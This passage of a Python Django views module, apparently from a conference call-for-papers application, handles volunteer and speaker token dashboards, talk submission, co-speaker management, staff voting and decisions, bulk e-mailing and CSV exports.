            base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
            url = base_url + reverse('volunteer-dashboard', kwargs=dict(volunteer_token=volunteer.token))
            body = render_to_string('cfp/mails/volunteer_send_token.txt', {
                'volunteer': volunteer,
                'url': url,
                'conf': request.conference
            })
            send_message(
                thread=volunteer.conversation,
                author=request.conference,
                subject=_("[%(conference)s] Someone asked to access your profil") % {'conference': request.conference},
                content=body,
            )
            messages.success(request, _('A email have been sent with a link to access to your profil.'))
            return redirect(reverse('volunteer-mail-token'))
    return render(request, 'cfp/volunteer_mail_token.html', {
        'form': form,
    })
@volunteer_required
def volunteer_dashboard(request, volunteer):
    """Volunteer landing page listing this conference's activities."""
    context = {
        'volunteer': volunteer,
        'activities': Activity.objects.filter(site=request.conference.site),
    }
    return render(request, 'cfp/volunteer_dashboard.html', context)
@volunteer_required
def volunteer_profile(request, volunteer):
    """Let a volunteer edit his/her own profile."""
    form = VolunteerForm(request.POST or None, instance=volunteer, conference=request.conference)
    submitted = request.method == 'POST' and form.is_valid()
    if submitted:
        form.save()
        messages.success(request, _('Changes saved.'))
        return redirect(reverse('volunteer-dashboard', kwargs={'volunteer_token': volunteer.token}))
    return render(request, 'cfp/volunteer_profile.html', {
        'form': form,
        'volunteer': volunteer,
    })
@volunteer_required
def volunteer_update_activity(request, volunteer, activity, join):
    """Subscribe (join=True) or unsubscribe a volunteer from an activity."""
    activity = get_object_or_404(Activity, slug=activity, site=request.conference.site)
    if join:
        volunteer.activities.add(activity)
        feedback = _('Thank you for your participation!')
    else:
        volunteer.activities.remove(activity)
        feedback = _('Okay, no problem!')
    messages.success(request, feedback)
    return redirect(reverse('volunteer-dashboard', kwargs={'volunteer_token': volunteer.token}))
@staff_required
def volunteer_list(request):
    """Staff view: filterable volunteer list with CSV export and bulk actions."""
    site = request.conference.site
    filter_form = VolunteerFilterForm(request.GET or None, site=site)
    # Filtering
    show_filters = False
    volunteers = Volunteer.objects.filter(site=site).order_by('pk').distinct().prefetch_related('activities')
    if filter_form.is_valid():
        data = filter_form.cleaned_data
        if len(data['activity']):
            show_filters = True
            q = Q()
            # 'none' is a pseudo-slug meaning "no activity at all".
            if 'none' in data['activity']:
                data['activity'].remove('none')
                q |= Q(activities__isnull=True)
            if len(data['activity']):
                q |= Q(activities__slug__in=data['activity'])
            volunteers = volunteers.filter(q)
    # Action
    action_form = VolunteerActionForm(request.POST or None, volunteers=volunteers)
    if request.method == 'POST' and action_form.is_valid():
        data = action_form.cleaned_data
        if data['email']:
            # Stash the selection in the session for the e-mail wizard.
            request.session['volunteer-email-list'] = data['volunteers']
            return redirect(reverse('volunteer-email'))
        return redirect(request.get_full_path())
    if request.GET.get('format') == 'csv':
        # CSV export of the (filtered) volunteer list.
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename="volunteers.csv"'
        writer = csv.writer(response)
        for volunteer in volunteers:
            writer.writerow(volunteer.get_csv_row())
        return response
    else:
        contact_link = 'mailto:' + ','.join([volunteer.email for volunteer in volunteers.all()])
        # Same query string with format=csv, used for the export link.
        csv_query_dict = request.GET.copy()
        csv_query_dict['format'] = 'csv'
        csv_link = '?' + csv_query_dict.urlencode()
        return render(request, 'cfp/staff/volunteer_list.html', {
            'volunteer_list': volunteers,
            'filter_form': filter_form,
            'action_form': action_form,
            'show_filters': show_filters,
            'contact_link': contact_link,
            'csv_link': csv_link,
            'pending_email': bool(request.session.get('volunteer-email-list', None)),
        })
@staff_required
def volunteer_details(request, volunteer_id):
    """Staff view of one volunteer, with a reply form on the conversation."""
    volunteer = get_object_or_404(Volunteer, site=request.conference.site, pk=volunteer_id)
    message_form = MessageForm(request.POST or None)
    if request.method == 'POST' and message_form.is_valid():
        # Thread the reply after the latest message of the conversation.
        last_message = volunteer.conversation.message_set.last()
        send_message(
            thread=volunteer.conversation,
            author=request.user,
            subject='',
            content=message_form.cleaned_data['content'],
            in_reply_to=last_message,
        )
        messages.success(request, _('Message sent!'))
        return redirect(reverse('volunteer-details', args=[volunteer.pk]))
    return render(request, 'cfp/staff/volunteer_details.html', {
        'volunteer': volunteer,
    })
@staff_required
def volunteer_email(request):
    """Compose/confirm a bulk e-mail to volunteers selected in the list view.

    The selection and the draft are kept in the session so the form
    survives the preview/confirm round-trip.
    """
    volunteers = Volunteer.objects.filter(pk__in=request.session.get('volunteer-email-list', []))
    if not volunteers.exists():
        messages.error(request, _('Please select some volunteers.'))
        return redirect('volunteer-list')
    form = SendVolunteerMailForm(request.POST or None, initial=request.session.get('volunteer-email-stored'), volunteers=volunteers)
    if request.method == 'POST' and form.is_valid():
        subject = form.cleaned_data['subject']
        body = form.cleaned_data['body']
        # Remember the draft for the confirmation step.
        request.session['volunteer-email-stored'] = {'subject': subject, 'body': body}
        if form.cleaned_data['confirm']:
            sent = volunteer_email_send(volunteers, subject, body)
            messages.success(request, _('%(count)d mails have been sent.') % {'count': sent})
            del request.session['volunteer-email-list']
            return redirect('volunteer-list')
        else:
            # First valid submission: ask for confirmation before sending.
            # NOTE(review): the message text has a typo ("Your ready") — it is
            # a translation key, so fixing it here would orphan translations.
            messages.info(request, _('Your ready to send %(count)d emails.') % {'count': volunteers.count()})
    else:
        # The confirm checkbox only appears after a first valid submission.
        form.fields.pop('confirm')
    return render(request, 'cfp/staff/volunteer_email.html', {
        'volunteers': volunteers,
        'form': form,
    })
@require_http_methods(['POST'])
@staff_required
def volunteer_email_preview(request):
    """Return the rendered preview of a volunteer e-mail (POST-only endpoint)."""
    form = PreviewVolunteerMailForm(request.POST or None)
    if not form.is_valid():
        return HttpResponseServerError()
    volunteer = get_object_or_404(
        Volunteer, site=request.conference.site, pk=form.cleaned_data['volunteer'])
    rendered = volunteer_email_render_preview(
        volunteer, form.cleaned_data['subject'], form.cleaned_data['body'])
    return HttpResponse(rendered)
def proposal_home(request):
    """Combined speaker sign-up and first talk submission form.

    Speakers already known by e-mail are redirected to their dashboard.
    On success the speaker and the talk are created, linked together, and
    a confirmation mail with the secret (token-based) URLs is sent.
    """
    categories = request.conference.opened_categories
    if not categories.exists():
        # Call for proposals is closed.
        return render(request, 'cfp/closed.html')
    initial = {}
    fields = ['name', 'email', 'biography']
    if request.user.is_authenticated:
        if Participant.objects.filter(site=request.conference.site, email=request.user.email).exists():
            return redirect(reverse('proposal-dashboard'))
        elif not request.POST:
            # Pre-fill the speaker form from the user profile on first GET.
            initial.update({
                'name': request.user.get_full_name(),
                'biography': request.user.profile.biography,
            })
        # Authenticated users keep their account e-mail; drop the field.
        fields.remove('email')
    NewSpeakerForm = modelform_factory(Participant, form=ParticipantForm, fields=fields)
    speaker_form = NewSpeakerForm(request.POST or None, initial=initial, conference=request.conference)
    talk_form = TalkForm(request.POST or None, categories=categories)
    if request.method == 'POST' and all(map(lambda f: f.is_valid(), [speaker_form, talk_form])):
        speaker = speaker_form.save(commit=False)
        speaker.site = request.conference.site
        if request.user.is_authenticated:
            speaker.email = request.user.email
        speaker.save()
        talk = talk_form.save(commit=False)
        talk.site = request.conference.site
        talk.save()
        talk.speakers.add(speaker)
        # Secret URLs mailed to the speaker.
        base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
        url_dashboard = base_url + reverse('proposal-dashboard', kwargs=dict(speaker_token=speaker.token))
        url_talk_details = base_url + reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk))
        url_speaker_add = base_url + reverse('proposal-speaker-add', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk))
        body = _("""Hi {},
Your talk has been submitted for {}.
Here are the details of your talk:
Title: {}
Description: {}
You can at anytime:
- review and edit your profile: {}
- review and edit your talk: {}
- add a new co-speaker: {}
If you have any question, your can answer to this email.
Thanks!
{}
""").format(
            speaker.name, request.conference.name, talk.title, talk.description,
            url_dashboard, url_talk_details, url_speaker_add,
            request.conference.name,
        )
        send_message(
            thread=speaker.conversation,
            author=request.conference,
            subject=_("[%(conference)s] Thank you for your proposition '%(talk)s'") % {
                'conference': request.conference.name,
                'talk': talk,
            },
            content=body,
        )
        messages.success(request, _('You proposition have been successfully submitted!'))
        return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
    return render(request, 'cfp/proposal_home.html', {
        'speaker_form': speaker_form,
        'talk_form': talk_form,
    })
def proposal_mail_token(request):
    """Send a speaker his/her secret dashboard link by e-mail.

    The speaker is looked up by e-mail on the current conference site;
    unknown addresses get an error message instead of a mail.
    """
    form = EmailForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        try:
            speaker = Participant.objects.get(site=request.conference.site, email=form.cleaned_data['email'])
        except Participant.DoesNotExist:
            messages.error(request, _('Sorry, we do not know this email.'))
        else:
            # Build the absolute secret URL for the speaker dashboard.
            base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
            dashboard_url = base_url + reverse('proposal-dashboard', kwargs=dict(speaker_token=speaker.token))
            body = _("""Hi {},
Someone, probably you, asked to access your profile.
You can edit your talks or add new ones following this url:
{}
If you have any question, your can answer to this email.
Sincerely,
{}
""").format(speaker.name, dashboard_url, request.conference.name)
            send_message(
                thread=speaker.conversation,
                author=request.conference,
                subject=_("[%(conference)s] Someone asked to access your profil") % {
                    'conference': request.conference.name,
                },
                content=body,
            )
            messages.success(request, _('A email have been sent with a link to access to your profil.'))
            return redirect(reverse('proposal-mail-token'))
    return render(request, 'cfp/proposal_mail_token.html', {
        'form': form,
    })
@speaker_required
def proposal_dashboard(request, speaker):
    """Speaker landing page listing all of his/her talks."""
    context = {'speaker': speaker, 'talks': speaker.talk_set.all()}
    return render(request, 'cfp/proposal_dashboard.html', context)
@speaker_required
def proposal_talk_details(request, speaker, talk_id):
    """Show one of the speaker's talks (404 when the talk is not his/hers)."""
    talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
    context = {'talk': talk, 'speaker': speaker}
    return render(request, 'cfp/proposal_talk_details.html', context)
@speaker_required
def proposal_talk_edit(request, speaker, talk_id=None):
    """Create (talk_id=None) or edit one of the speaker's talks."""
    if talk_id:
        talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
    else:
        talk = None
    categories = request.conference.opened_categories
    form = TalkForm(request.POST or None, request.FILES or None, categories=categories, instance=talk)
    if request.method == 'POST' and form.is_valid():
        talk = form.save(commit=False)
        talk.site = request.conference.site
        talk.save()
        # Idempotent for an edit; links the speaker on creation.
        talk.speakers.add(speaker)
        if talk_id:
            messages.success(request, _('Changes saved.'))
        else:
            # TODO: it could be great to receive the proposition by mail
            # but this is not crucial as the speaker already have a link in its mailbox
            messages.success(request, _('You proposition have been successfully submitted!'))
        return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
    return render(request, 'cfp/proposal_talk_form.html', {
        'speaker': speaker,
        'talk': talk,
        'form': form,
    })
@speaker_required
def proposal_talk_acknowledgment(request, speaker, talk_id, confirm):
    """Let a speaker confirm (confirm=True) or cancel his/her participation.

    Only allowed when acceptances are disclosed, the talk is accepted and
    the conference is not completed. The decision is recorded on the talk
    and reported in the talk's conversation thread.
    """
    # TODO: handle multiple speakers case
    talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
    if not request.conference.disclosed_acceptances or not talk.accepted or request.conference.completed:
        raise PermissionDenied
    if talk.confirmed == confirm:
        # No state change; just inform the speaker.
        if confirm:
            messages.warning(request, _('You already confirmed your participation to this talk.'))
        else:
            messages.warning(request, _('You already cancelled your participation to this talk.'))
    else:
        talk.confirmed = confirm
        talk.save()
        if confirm:
            confirmation_message = _('Your participation has been taken into account, thank you!')
            action = _('confirmed')
        else:
            confirmation_message = _('We have noted your unavailability.')
            action = _('cancelled')
        content = _('Speaker %(speaker)s %(action)s his/her participation for %(talk)s.') % {
            'speaker': speaker,
            'action': action,
            'talk': talk,
        }
        send_message(
            thread=talk.conversation,
            author=speaker,
            subject=_('[%(conference)s] %(speaker)s %(action)s his/her participation') % {
                'conference': request.conference,
                'speaker': speaker,
                'action': action,
            },
            content=content,
        )
        messages.success(request, confirmation_message)
    return redirect(reverse('proposal-talk-details', kwargs={'speaker_token': speaker.token, 'talk_id': talk.pk}))
# FIXME is this view really useful?
#@speaker_required
#def proposal_speaker_details(request, speaker, talk_id, co_speaker_id):
# talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
# co_speaker = get_object_or_404(Participant, site=request.conference.site, talk_set__pk=talk.pk, pk=co_speaker_id)
# return render(request, 'cfp/proposal_speaker_details.html', {
# 'speaker': speaker,
# 'talk': talk,
# 'co_speaker': co_speaker,
# })
@speaker_required
def proposal_speaker_edit(request, speaker, talk_id=None, co_speaker_id=None):
    """Edit a speaker profile, in three flavours.

    - no talk_id: the speaker edits his/her own profile;
    - talk_id only: add a brand new co-speaker to the talk (with an
      optional notification e-mail);
    - talk_id + co_speaker_id: edit an existing co-speaker of the talk.
    """
    talk, co_speaker, co_speaker_candidates = None, None, None
    if talk_id:
        talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
        if co_speaker_id:
            co_speaker = get_object_or_404(Participant, site=request.conference.site, talk__pk=talk.pk, pk=co_speaker_id)
        else:
            # Known co-speakers of this speaker not yet on this talk.
            co_speaker_candidates = speaker.co_speaker_set.exclude(pk__in=talk.speakers.values_list('pk'))
    EditSpeakerForm = modelform_factory(Participant, form=ParticipantForm, fields=['name', 'email', 'biography'] + ParticipantForm.SOCIAL_FIELDS)
    all_forms = []
    speaker_form = EditSpeakerForm(request.POST or None, conference=request.conference, instance=co_speaker if talk else speaker)
    all_forms.append(speaker_form)
    if talk and not co_speaker_id:
        # Only when adding a new co-speaker do we offer the notification.
        notify_form = NotifyForm(request.POST or None)
        all_forms.append(notify_form)
    else:
        notify_form = None
    if request.method == 'POST' and all(map(lambda f: f.is_valid(), all_forms)):
        edited_speaker = speaker_form.save()
        if talk:
            talk.speakers.add(edited_speaker)
            if co_speaker_id:
                messages.success(request, _('Changes saved.'))
            else:
                if notify_form.cleaned_data['notify']:
                    # Mail the new co-speaker his/her secret URLs.
                    base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
                    url_dashboard = base_url + reverse('proposal-dashboard', kwargs=dict(speaker_token=edited_speaker.token))
                    url_talk_details = base_url + reverse('proposal-talk-details', kwargs=dict(speaker_token=edited_speaker.token, talk_id=talk.pk))
                    url_speaker_add = base_url + reverse('proposal-speaker-add', kwargs=dict(speaker_token=edited_speaker.token, talk_id=talk.pk))
                    body = _("""Hi {},
{} add you as a co-speaker for the conference {}.
Here is a summary of the talk:
Title: {}
Description: {}
You can at anytime:
- review and edit your profile: {}
- review and edit the talk: {}
- add another co-speaker: {}
If you have any question, your can answer to this email.
Thanks!
{}
""").format(
                        edited_speaker.name, speaker.name, request.conference.name,
                        talk.title, talk.description,
                        url_dashboard, url_talk_details, url_speaker_add,
                        request.conference.name,
                    )
                    send_message(
                        thread=edited_speaker.conversation,
                        author=request.conference,
                        subject=_("[%(conference)s] You have been added as co-speaker to '%(talk)s'") % {
                            'conference': request.conference,
                            'talk': talk,
                        },
                        content=body,
                    )
                messages.success(request, _('Co-speaker successfully added to the talk.'))
            #return redirect(reverse('proposal-speaker-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
            return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
        else:
            return redirect(reverse('proposal-dashboard', kwargs=dict(speaker_token=speaker.token)))
    return render(request, 'cfp/proposal_speaker_form.html', {
        'speaker': speaker,
        'talk': talk,
        'co_speaker': co_speaker,
        'co_speaker_candidates': co_speaker_candidates,
        'speaker_form': speaker_form,
        'notify_form': notify_form,
    })
@speaker_required
def proposal_speaker_add(request, speaker, talk_id, speaker_id):
    """Attach one of the speaker's known co-speakers to a talk."""
    talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
    # Restrict the lookup to people who already co-spoke with this speaker.
    known_pks = speaker.co_speaker_set.values_list('pk')
    co_speaker = get_object_or_404(Participant, pk__in=known_pks, pk=speaker_id)
    talk.speakers.add(co_speaker)
    messages.success(request, _('Co-speaker successfully added to the talk.'))
    return redirect(reverse('proposal-talk-details', kwargs={'speaker_token': speaker.token, 'talk_id': talk_id}))
# TODO: ask for confirmation (with POST request needed)
@speaker_required
def proposal_speaker_remove(request, speaker, talk_id, co_speaker_id):
    """Detach a co-speaker from a talk; a speaker cannot remove him/herself."""
    talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
    co_speaker = get_object_or_404(Participant, site=request.conference.site, talk__pk=talk.pk, pk=co_speaker_id)
    if speaker.pk == co_speaker.pk:
        # Self-removal is forbidden.
        raise PermissionDenied
    talk.speakers.remove(co_speaker)
    messages.success(request, _('Co-speaker successfully removed from the talk.'))
    return redirect(reverse('proposal-talk-details', kwargs={'speaker_token': speaker.token, 'talk_id': talk_id}))
@staff_required
def talk_acknowledgment(request, talk_id, confirm):
    """Staff-side recording of a speaker confirmation or cancellation."""
    talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
    # Only accepted talks can change state, and only to a different state.
    if talk.accepted is not True or talk.confirmed == confirm:
        raise PermissionDenied
    # TODO: handle multiple speakers case
    talk.confirmed = confirm
    talk.save()
    if confirm:
        confirmation_message = _('The speaker confirmation have been noted.')
        action = _('confirmed')
        thread_note = _('The talk have been confirmed.')
    else:
        confirmation_message = _('The speaker unavailability have been noted.')
        action = _('cancelled')
        thread_note = _('The talk have been %(action)s.') % {'action': action}
    send_message(
        thread=talk.conversation,
        author=request.user,
        subject=_("[%(conference)s] The talk '%(talk)s' have been %(action)s.") % {
            'conference': request.conference,
            'talk': talk,
            'action': action,
        },
        content=thread_note,
    )
    messages.success(request, confirmation_message)
    return redirect(reverse('talk-details', kwargs=dict(talk_id=talk_id)))
@staff_required
def staff(request):
    """Staff section home page."""
    template_name = 'cfp/staff/base.html'
    return render(request, template_name)
@staff_required
def admin(request):
    """Admin section home page."""
    template_name = 'cfp/admin/base.html'
    return render(request, template_name)
@staff_required
def talk_list(request):
    """Staff talk list: filtering, bulk actions, CSV export and sorting."""
    talks = Talk.objects.filter(site=request.conference.site)
    # Filtering
    show_filters = False
    filter_form = TalkFilterForm(request.GET or None, site=request.conference.site)
    if filter_form.is_valid():
        data = filter_form.cleaned_data
        if len(data['category']):
            show_filters = True
            talks = talks.filter(reduce(lambda x, y: x | y, [Q(category__pk=pk) for pk in data['category']]))
        if len(data['accepted']):
            show_filters = True
            talks = talks.filter(reduce(lambda x, y: x | y, [Q(accepted=dict(ACCEPTATION_VALUES)[status]) for status in data['accepted']]))
        if len(data['confirmed']):
            show_filters = True
            # Confirmation only makes sense for accepted talks.
            talks = talks.filter(accepted=True)
            talks = talks.filter(reduce(lambda x, y: x | y, [Q(confirmed=dict(CONFIRMATION_VALUES)[status]) for status in data['confirmed']]))
        if data['room'] != None:
            show_filters = True
            talks = talks.filter(room__isnull=not data['room'])
        if data['scheduled'] != None:
            show_filters = True
            talks = talks.filter(start_date__isnull=not data['scheduled'])
        if len(data['tag']):
            show_filters = True
            talks = talks.filter(tags__slug__in=data['tag'])
        if len(data['track']):
            show_filters = True
            q = Q()
            # 'none' is a pseudo-slug meaning "no track assigned".
            if 'none' in data['track']:
                data['track'].remove('none')
                q |= Q(track__isnull=True)
            if len(data['track']):
                q |= Q(track__slug__in=data['track'])
            talks = talks.filter(q)
        if data['vote'] != None:
            show_filters = True
            # Filter on whether the current staff member has voted.
            if data['vote']:
                talks = talks.filter(vote__user=request.user)
            else:
                talks = talks.exclude(vote__user=request.user)
        if data['materials'] != None:
            show_filters = True
            materials_filter = Q(materials__isnull=False) & ~Q(materials__exact='')
            if data['materials']:
                talks = talks.filter(materials_filter)
            else:
                talks = talks.filter(~materials_filter)
        if data['video'] != None:
            show_filters = True
            if data['video']:
                talks = talks.exclude(video__exact='')
            else:
                talks = talks.filter(video__exact='')
    talks = talks.prefetch_related('category', 'speakers', 'track', 'tags')
    if request.GET.get('format') == 'csv':
        # CSV export of the (filtered) talk list.
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename="talks.csv"'
        writer = csv.writer(response)
        for talk in talks:
            writer.writerow(talk.get_csv_row())
        return response
    # Action
    action_form = TalkActionForm(request.POST or None, talks=talks, site=request.conference.site)
    if request.method == 'POST' and action_form.is_valid():
        data = action_form.cleaned_data
        for talk_id in data['talks']:
            talk = Talk.objects.get(site=request.conference.site, pk=talk_id)
            if data['decision'] != None and data['decision'] != talk.accepted:
                # Record the accept/decline decision in the talk's conversation.
                if data['decision']:
                    action = _('accepted')
                else:
                    action = _('declined')
                note = _('The talk has been %(action)s.') % {'action': action}
                send_message(
                    thread=talk.conversation,
                    author=request.user,
                    subject=_("[%(conference)s] The talk '%(talk)s' have been %(action)s") % {
                        'conference': request.conference,
                        'talk': talk,
                        'action': action,
                    },
                    content=note,
                )
                talk.accepted = data['decision']
            if data['track']:
                talk.track = Track.objects.get(site=request.conference.site, slug=data['track'])
            if data['tag']:
                talk.tags.add(Tag.objects.get(site=request.conference.site, slug=data['tag']))
            if data['room']:
                talk.room = Room.objects.get(site=request.conference.site, slug=data['room'])
            talk.save()
        if data['email']:
            # Hand off the selection to one of the two e-mail wizards.
            email = int(data['email'])
            if email == TalkActionForm.EMAIL_TALKS:
                request.session['talk-email-list'] = data['talks']
                return redirect(reverse('talk-email'))
            elif email == TalkActionForm.EMAIL_SPEAKERS:
                selected_talks = Talk.objects.filter(pk__in=data['talks'])
                speakers = Participant.objects.filter(pk__in=selected_talks.values('speakers__pk')).distinct()
                request.session['speaker-email-list'] = list(speakers.values_list('pk', flat=True))
                return redirect(reverse('speaker-email'))
        return redirect(request.get_full_path())
    # Sorting
    if request.GET.get('order') == 'desc':
        sort_reverse = True
    else:
        sort_reverse = False
    SORT_MAPPING = {
        'title': 'title',
        'category': 'category',
        'status': 'accepted',
    }
    sort = request.GET.get('sort')
    if sort in SORT_MAPPING.keys():
        if sort_reverse:
            talks = talks.order_by('-' + SORT_MAPPING[sort])
        else:
            talks = talks.order_by(SORT_MAPPING[sort])
    # Sorting URLs: one toggle link + glyphicon per sortable column.
    sort_urls = dict()
    sort_glyphicons = dict()
    for c in SORT_MAPPING.keys():
        url = request.GET.copy()
        url['sort'] = c
        if c == sort:
            if sort_reverse:
                del url['order']
                glyphicon = 'sort-by-attributes-alt'
            else:
                url['order'] = 'desc'
                glyphicon = 'sort-by-attributes'
        else:
            glyphicon = 'sort'
        sort_urls[c] = url.urlencode()
        sort_glyphicons[c] = glyphicon
    # Same query string with format=csv, used for the export link.
    csv_query_dict = request.GET.copy()
    csv_query_dict['format'] = 'csv'
    csv_link = '?' + csv_query_dict.urlencode()
    return render(request, 'cfp/staff/talk_list.html', {
        'show_filters': show_filters,
        'talk_list': talks,
        'filter_form': filter_form,
        'action_form': action_form,
        'sort_urls': sort_urls,
        'sort_glyphicons': sort_glyphicons,
        'csv_link': csv_link,
        'pending_email': bool(request.session.get('talk-email-list', None)),
    })
@staff_required
def talk_details(request, talk_id):
    """Staff view of one talk: the reviewer's current vote plus a comment form."""
    talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
    try:
        vote = talk.vote_set.get(user=request.user).vote
    except Vote.DoesNotExist:
        # The current staff member has not voted yet.
        vote = None
    message_form = MessageForm(request.POST or None)
    if request.method == 'POST' and message_form.is_valid():
        in_reply_to = talk.conversation.message_set.last()
        subject = _("[%(conference)s] New comment about '%(talk)s'") % {
            'conference': request.conference,
            'talk': talk,
        }
        if in_reply_to:
            # Maybe use in_reply_to.subject?
            subject = 'Re: ' + subject
        send_message(
            thread=talk.conversation,
            author=request.user,
            subject=subject,
            content=message_form.cleaned_data['content'],
            in_reply_to=in_reply_to,
        )
        messages.success(request, _('Message sent!'))
        return redirect(reverse('talk-details', args=[talk.pk]))
    return render(request, 'cfp/staff/talk_details.html', {
        'talk': talk,
        'vote': vote,
    })
@staff_required
def talk_vote(request, talk_id, score):
    """Record (or update) the current staff member's vote on a talk."""
    if score not in (-2, -1, 0, 1, 2):
        raise Http404
    talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
    vote, created = Vote.objects.get_or_create(talk=talk, user=request.user)
    vote.vote = score
    vote.save()
    if created:
        feedback = _('Vote successfully created')
    else:
        feedback = _('Vote successfully updated')
    messages.success(request, feedback)
    return redirect(talk.get_absolute_url())
@staff_required
def talk_decide(request, talk_id, accept):
    """Accept or decline a talk proposal.

    GET shows a confirmation page; POST records the decision, optionally
    notifies every speaker with the staff-provided message, and logs the
    decision in the talk's own conversation thread.
    """
    talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
    if request.method == 'POST':
        talk.accepted = accept
        talk.save()
        if accept:
            action = _('accepted')
        else:
            action = _('declined')
        # Do we need to send a notification to the proposer?
        m = request.POST.get('message', '').strip()
        if m:
            for participant in talk.speakers.all():
                send_message(
                    thread=participant.conversation,
                    author=request.conference,
                    subject=_("[%(conference)s] Your talk '%(talk)s' has been %(action)s") % {
                        'conference': request.conference,
                        'talk': talk,
                        'action': action,
                    },
                    content=m,
                )
        # Save the decision in the talk's conversation
        send_message(
            thread=talk.conversation,
            author=request.user,
            subject=_("[%(conference)s] The talk '%(talk)s' has been %(action)s") % {
                'conference': request.conference,
                'talk': talk,
                'action': action,
            },
            content=_('The talk has been %(action)s.') % {'action': action},
        )
        messages.success(request, _('Decision taken into account'))
        return redirect(talk.get_absolute_url())
    return render(request, 'cfp/staff/talk_decide.html', {
        'talk': talk,
        'accept': accept,
    })
@staff_required
def talk_email(request):
    """Compose and send a bulk email to the speakers of pre-selected talks.

    The talk selection is stored in the session by the talk-list action form.
    A first valid POST shows a confirmation step; only a POST with 'confirm'
    checked actually sends the mails.
    """
    talks = Talk.objects.filter(pk__in=request.session.get('talk-email-list', []))
    if not talks.exists():
        messages.error(request, _('Please select some talks.'))
        return redirect('talk-list')
    # Total number of recipients (each talk may have several speakers);
    # computed only when there actually are talks to mail.
    count = talks.annotate(speakers_count=Count('speakers', distinct=True)).aggregate(Sum('speakers_count'))['speakers_count__sum']
    form = SendTalkMailForm(request.POST or None, initial=request.session.get('talk-email-stored'), talks=talks)
    if request.method == 'POST' and form.is_valid():
        subject = form.cleaned_data['subject']
        body = form.cleaned_data['body']
        # Keep the draft in the session so it survives the confirmation round-trip
        request.session['talk-email-stored'] = {'subject': subject, 'body': body}
        if form.cleaned_data['confirm']:
            sent = talk_email_send(talks, subject, body)
            messages.success(request, _('%(count)d mails have been sent.') % {'count': sent})
            del request.session['talk-email-list']
            return redirect('talk-list')
        else:
            messages.info(request, _("You're ready to send %(count)d emails.") % {'count': count})
    else:
        # First display: hide the confirmation checkbox until the draft validates
        form.fields.pop('confirm')
    return render(request, 'cfp/staff/talk_email.html', {
        'talks': talks,
        'form': form,
    })
@require_http_methods(['POST'])
@staff_required
def talk_email_preview(request):
    """Render the preview of a bulk talk email for one speaker/talk pair."""
    form = PreviewTalkMailForm(request.POST or None)
    if not form.is_valid():
        return HttpResponseServerError()
    data = form.cleaned_data
    site = request.conference.site
    speaker = get_object_or_404(Participant, site=site, pk=data['speaker'])
    talk = get_object_or_404(Talk, site=site, pk=data['talk'])
    return HttpResponse(talk_email_render_preview(talk, speaker, data['subject'], data['body']))
@staff_required
def participant_list(request):
    """Staff listing of participants with filtering, bulk email action and CSV export."""
    # Case-insensitive ordering by name via an SQL lower() extra column
    participants = Participant.objects.filter(site=request.conference.site) \
                        .extra(select={'lower_name': 'lower(name)'}) \
                        .order_by('lower_name')
    # Filtering
    show_filters = False
    filter_form = ParticipantFilterForm(request.GET or None, site=request.conference.site)
    if filter_form.is_valid():
        data = filter_form.cleaned_data
        # Participants are filtered indirectly: build a talk queryset first,
        # then keep participants having at least one matching talk.
        talks = Talk.objects.filter(site=request.conference.site)
        if len(data['category']):
            show_filters = True
            talks = talks.filter(reduce(lambda x, y: x | y, [Q(category__pk=pk) for pk in data['category']]))
        if len(data['accepted']):
            show_filters = True
            talks = talks.filter(reduce(lambda x, y: x | y, [Q(accepted=dict(ACCEPTATION_VALUES)[status]) for status in data['accepted']]))
        if len(data['confirmed']):
            show_filters = True
            # Confirmation status only makes sense for accepted talks
            talks = talks.filter(accepted=True)
            talks = talks.filter(reduce(lambda x, y: x | y, [Q(confirmed=dict(CONFIRMATION_VALUES)[status]) for status in data['confirmed']]))
        if len(data['track']):
            show_filters = True
            q = Q()
            # 'none' is a pseudo-slug meaning "no track assigned"
            if 'none' in data['track']:
                data['track'].remove('none')
                q |= Q(track__isnull=True)
            if len(data['track']):
                q |= Q(track__slug__in=data['track'])
            talks = talks.filter(q)
        participants = participants.filter(talk__in=talks)
    # Action
    action_form = SpeakerActionForm(request.POST or None, speakers=participants)
    if request.method == 'POST' and action_form.is_valid():
        data = action_form.cleaned_data
        if data['email']:
            # Stash the selection in the session for the speaker-email wizard
            request.session['speaker-email-list'] = data['speakers']
            return redirect(reverse('speaker-email'))
        return redirect(request.get_full_path())
    if request.GET.get('format') == 'csv':
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename="participants.csv"'
        writer = csv.writer(response)
        for participant in participants:
            writer.writerow(participant.get_csv_row())
        return response
    else:
        contact_link = 'mailto:' + ','.join([participant.email for participant in participants.all()])
        # Link to this same view with the current filters plus format=csv
        csv_query_dict = request.GET.copy()
        csv_query_dict['format'] = 'csv'
        csv_link = '?' + csv_query_dict.urlencode()
